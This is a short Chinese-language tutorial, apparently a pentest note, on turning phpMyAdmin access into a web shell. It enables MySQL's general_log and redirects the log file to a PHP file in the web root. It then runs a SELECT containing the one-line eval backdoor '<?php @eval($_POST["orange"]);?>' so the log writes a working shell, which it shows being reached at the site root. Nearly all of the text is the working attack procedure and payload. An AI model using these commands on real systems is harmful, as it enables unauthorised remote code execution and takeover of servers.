通过 phpmyadmin  getshell

general_log默认为关闭的，root权限开启后，general_log_file会保存所有的查询语句

可以开启general_log，然后设置general_log_file为一个php文件，最后用一句话木马进行查询来获取shell

进入phpmyadmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like 'general_log';

general log是关闭状态，执行SQL语句开启general log

SET GLOBAL general_log = ON

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file='D:/wamp/www/orange.php';

看下刚刚创建的orange.php里的内容

然后执行SQL查询语句，写个一句话进去。

SELECT '<?php @eval($_POST["orange"]);?>';

现在再看下orange.php里面的内容

成功插入了一句话木马

一句话链接在根目录（http://127.0.0.1/orange.php）

至此结束！

任重而道远！